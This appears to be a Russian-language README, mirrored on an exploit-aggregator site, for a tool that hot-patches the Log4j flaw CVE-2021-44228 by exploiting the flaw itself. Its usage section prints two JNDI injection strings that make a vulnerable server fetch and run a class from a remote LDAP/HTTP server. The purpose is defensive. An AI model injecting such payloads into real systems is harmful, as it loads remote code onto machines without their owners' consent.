## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-QINGTENGYUN-CVE-2021-44228-QINGTENG-ONLINE-PATCH
# cve-2021-44228-qingteng-online-patch
## Что это
Горячий патч для CVE-2021-44228, использующий саму уязвимость.
## Использование
Вставьте следующий код в любое место, которое, вероятно, уязвимо к CVE-2021-44228,
root@kitploit:~
${jndi:ldap://your-own-server/patch}
Чтобы предотвратить MITM-атаку во время процесса установки патча, рекомендуется следующий payload, но он менее совместим со старыми версиями Java,
root@kitploit:~
${jndi:ldap://your-own-server/any_string_except_patch}
## Запуск собственного сервера
1. Скачайте последние релизы
2. Если вы хотите размещать Hotfix.class на собственном сервере, укажите системные переменные окружения `LOG4J_HOTFIX_HTTP_PATH` и `LOG4J_HOTFIX_HTTPS_PATH`